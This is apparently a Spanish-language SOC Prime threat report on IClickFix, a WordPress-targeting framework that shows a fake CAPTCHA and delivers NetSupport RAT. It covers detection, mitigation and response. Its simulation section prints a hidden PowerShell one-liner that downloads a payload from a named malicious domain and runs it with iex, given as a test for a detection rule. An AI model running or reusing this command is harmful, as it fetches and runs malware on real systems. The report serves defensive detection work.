SOC Prime Bias: Medio

03 Feb 2026 18:25 UTC

Conozca IClickFix: un marco de trabajo extendido dirigido a WordPress utilizando la táctica ClickFix

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Seguir
Conozca IClickFix: un marco de trabajo extendido dirigido a WordPress utilizando la táctica ClickFix
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

El informe perfila IClickFix, un marco de JavaScript malicioso que compromete sitios de WordPress y presenta un CAPTCHA falso al estilo de Cloudflare Turnstile. El señuelo coacciona a los visitantes a ejecutar un comando de PowerShell que descarga e instala NetSupport RAT. La entrega está respaldada por un sistema de distribución de tráfico construido alrededor del acortador de URL YOURLS y un conjunto rotativo de dominios de redireccionamiento. Los investigadores observaron más de 3,800 sitios de WordPress comprometidos que sirvieron esta cadena a nivel mundial desde finales de 2024.

Investigación

Los analistas de Sekoia identificaron la etiqueta de JavaScript inyectado ic-tracker-js en sitios comprometidos, luego reconstruyeron el flujo de redirección a través de múltiples dominios de corta duración. Capturaron el patrón exacto de ejecución de PowerShell utilizado para recuperar la carga final y recuperaron los componentes de NetSupport RAT caídos junto con indicadores de infraestructura C2 asociados.

Mitigación

Monitorear el contenido web para la ic-tracker-js inyección y bloquear dominios maliciosos conocidos, redireccionadores y servicios de enlace corto utilizados en la cadena. En los endpoints, detectar patrones de descarga y ejecución de PowerShell consistentes con el señuelo ClickFix. Añadir cobertura para la creación de archivos del cliente NetSupport y para persistencia a través de Run claves de registro a nivel de usuario.

Respuesta

Cuando aparezcan indicadores, aislar el endpoint, detener el proceso activo de PowerShell y eliminar los binarios de NetSupport junto con cualquier persistencia basada en el registro. Continuar con una triage forense completo para confirmar que el atacante no desplegó implantes adicionales ni estableció rutas de acceso secundarias.

Flujo de Ataque

Ejecución de Simulación

Requisito previo: El chequeo de Telemetría y Línea de Base previo al vuelo debe haber pasado.

  • Narrativa y Comandos de Ataque:

    Un adversario que tiene acceso inicial al endpoint desea establecer un punto de apoyo persistente entregando el NetSupport RAT. Para evadir la detección interactiva, lanzan PowerShell en modo oculto sin perfil ni logotipo (-w hidden -nop -c). Luego usan Invoke‑WebRequest (iwr) para descargar una carga maliciosa en JSON (tytuy.json) que contiene un script de PowerShell para el RAT. El script se escribe en el directorio temporal y se ejecuta a través de Invoke‑Expression. Esta línea de comando exacta coincide con las cadenas que la regla Sigma monitorea.

  • Script de Prueba de Regresión:

    # Comando en una línea de PowerShell que coincide con la regla de detección
    $url = 'https://scottvmorton.com/tytuy.json'
    $out = "$env:TEMPpayload.ps1"
    
    powershell -w hidden -nop -c "iwr '$url' -OutFile $out; iex (Get-Content $out -Raw)"
  • Comandos de Limpieza:

    # Eliminar la carga descargada y cualquier proceso de PowerShell restante
    Remove-Item -Path "$env:TEMPpayload.ps1" -ErrorAction SilentlyContinue
    Get-Process -Name powershell | Where-Object {$_.CommandLine -match 'tytuy.json'} | Stop-Process -Force